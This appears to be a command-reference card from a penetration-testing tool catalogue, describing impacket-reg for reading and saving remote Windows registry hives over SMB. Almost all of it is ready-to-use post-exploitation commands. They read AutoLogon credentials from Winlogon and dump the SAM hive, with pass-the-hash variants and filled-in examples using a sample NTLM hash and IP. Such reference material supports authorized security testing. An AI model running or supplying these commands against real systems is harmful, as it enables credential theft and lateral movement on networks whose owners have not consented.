Impacket Remote Registry

Query, add, or save remote registry hives over SMB without dropping a binary on the host. Commonly used to read AutoLogon credentials, dump SAM/SECURITY/SYSTEM, or check for sensitive policies.

Tool
impacket-reg
Category
Post-Exploitation / AD Object Manipulation
Platform
linux
Requires
password
Protocols
SMB, RPC

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

impacket-reg '<domain>/<user>:<password>@<ip>' query -keyName '<HKLM\\path>'

Credential variants

The same attack using a different authentication material.

NTLM Hash requires NTLM hash

impacket-reg -hashes ':<hash>' '<domain>/<user>@<ip>' query -keyName '<HKLM\\path>'

Save SAM/SYSTEM/SECURITY requires password

impacket-reg '<domain>/<user>:<password>@<ip>' save -keyName HKLM\\SAM -o \\\\<ip>\\C$\\Windows\\Temp\\sam.save

Read AutoLogon requires password

impacket-reg '<domain>/<user>:<password>@<ip>' query -keyName 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'

Examples

impacket-reg 'CORP/jdoe:Password123!@10.10.10.10' query -keyName 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'
impacket-reg -hashes ':e19ccf75ee54e06b06a5907af13cef42' 'CORP/admin@10.10.10.10' save -keyName HKLM\\SAM -o '\\\\10.10.10.10\\C$\\Temp\\sam.save'

Tags

impacket reg registry remote post-exploitation

References